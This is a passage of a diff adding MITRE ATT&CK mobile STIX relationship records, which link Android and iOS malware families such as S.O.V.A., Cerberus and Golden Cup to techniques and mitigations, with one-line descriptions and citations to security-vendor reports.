+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--23ecc134-0623-45ec-b8b5-52516483bda1", + "created": "2023-04-14T14:10:04.452Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T14:10:04.452Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has used code abstraction and anti-emulation checks to potentially avoid running while under analysis.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--82f51cc6-6ce4-459e-b598-7b2b77983469", + "created": "2020-04-24T15:06:33.526Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:28:18.530Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect SMS messages.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d6be8665-afbb-4be5-a56a-493af01b120a", + "created": "2022-03-30T15:52:29.935Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can potentially detect jailbroken or rooted devices.", + "modified": "2022-03-30T15:52:29.935Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--62623afc-8222-4d59-b5d0-7bc1ccc7fadc", + "created": "2023-02-06T19:41:40.104Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:35:04.072Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can silently intercept and manipulate notifications. [S.O.V.A.](https://attack.mitre.org/software/S1062) can also inject cookies via push notifications.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--89565753-23c4-422d-a9ba-39f4101cd819", + "type": "relationship", + "created": "2020-11-20T16:37:28.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.485Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can track the device’s location.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--abd2e863-4bd3-4686-b2aa-f8a097a41c99", + "created": "2017-10-25T14:48:53.742Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Elcomsoft-iOSRestricted", + "url": "https://blog.elcomsoft.com/2018/09/ios-12-enhances-usb-restricted-mode/", + "description": "Oleg Afonin. (2018, September 20). iOS 12 Enhances USB Restricted Mode. Retrieved September 21, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS 11.4.1 and higher introduce USB Restricted Mode, which disables data access through the device's charging port under certain conditions (making the port only usable for power), likely preventing this technique from working.(Citation: Elcomsoft-iOSRestricted)", + "modified": "2022-04-01T15:35:28.360Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b0625604-e4c4-402b-b191-f43137d38d99", + "created": "2020-11-20T15:44:57.481Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:29:50.160Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect sent and received SMS messages.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6885280e-5423-422a-94f1-e91d557e043e", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PaloAlto-XcodeGhost1", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved December 21, 2016." + }, + { + "source_name": "PaloAlto-XcodeGhost", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) was injected into apps by a modified version of Xcode (Apple's software development tool).(Citation: PaloAlto-XcodeGhost1)(Citation: PaloAlto-XcodeGhost)", + "modified": "2022-04-15T15:10:16.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "target_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--58c857f8-4f40-48e0-b3ac-41944d82b576", + "created": "2020-12-24T22:04:27.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:54:02.223Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has collected a list of contacts.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6ce36374-2ff6-4b41-8493-148416153232", + "type": "relationship", + "created": "2020-07-20T13:27:33.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.526Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can collect user account, photos, browser history, and arbitrary files.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--991ef2f2-c196-4d5d-bd29-504ea25831f4", + "type": "relationship", + "created": "2021-10-01T14:42:48.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:48.815Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can record from the device’s camera.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--520c7112-9768-42c5-8917-1950efd182f9", + "created": "2023-02-06T19:38:45.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:33:30.155Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can use keylogging to capture user input.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--046acda0-91de-4385-bcfb-157570d8e51d", + "created": "2023-03-30T15:25:00.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T15:26:46.611Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can search for installed applications that match a list of targets.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--42f8d024-64a7-4bbf-8c05-2b0c7e667396", + "type": "relationship", + "created": "2020-12-14T15:02:35.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T15:02:35.304Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) has stored encrypted strings in the APK file.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9366529d-fba9-4ef6-b4ee-b6b41aa3b18c", + "type": "relationship", + "created": "2019-07-10T15:35:43.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.741Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) queries the device for metadata, such as device ID, OS version, and the number of cameras.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f776a4da-0fa6-414c-a705-e9e8b419e056", + "type": "relationship", + "created": "2020-06-26T15:32:25.058Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + }, + { + "source_name": "CheckPoint Cerberus", + "url": "https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/", + "description": "A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:32:25.058Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can inject input to grant itself additional permissions without user interaction and to prevent application removal.(Citation: Threat Fabric Cerberus)(Citation: CheckPoint Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8b27a786-b4d9-4014-a249-3725442f9f1d", + "type": "relationship", + "created": "2021-01-05T20:16:20.499Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.499Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can obtain a list of installed applications.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1b7be26d-cb1d-497b-94bf-a34f11ed66c9", + "type": "relationship", + "created": "2020-09-11T14:54:16.548Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.548Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can obtain a list of installed applications.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ac53e382-a140-4bbf-a59d-db3fe21acfaa", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--a9cab8f6-4c94-4c9b-9e7d-9d863ff53431", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3ebcd3d8-dd8e-4cc9-8087-ce9e93df6f56", + "created": "2017-10-25T14:48:53.738Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 9 introduced a new security policy that prevents applications from reading or writing data to other applications’ internal storage directories, regardless of permissions. ", + "modified": "2022-04-01T13:51:48.934Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7017085c-c612-48b2-b655-e18d7822d0e7", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:39:48.895Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests phone call history from victims.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4bdda427-2fff-428d-ba19-4bee5d2508e1", + "type": "relationship", + "created": "2021-02-08T16:36:20.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.571Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included video recording in the malicious apps deployed as part of Operation BULL.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c81757a7-16b1-4b48-ae52-3d375f533dfd", + "created": "2022-04-01T15:03:02.553Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T15:03:02.553Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eee008fa-a46f-4542-93e3-8fe5f949130f", + "created": "2023-01-19T18:06:57.242Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:21:37.086Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can check to see if WiFi is enabled.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9d264e84-27b2-4867-82c8-55486a969d7c", + "type": "relationship", + "created": "2020-12-17T20:15:22.489Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.489Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can obtain a list of running processes.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e2ee6825-43c2-441f-ba96-404a330a9059", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:54:51.590Z", + "description": "[Charger](https://attack.mitre.org/software/S0323) steals contacts from the victim user's device.(Citation: CheckPoint-Charger)", + "relationship_type": "uses", + "source_ref": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + 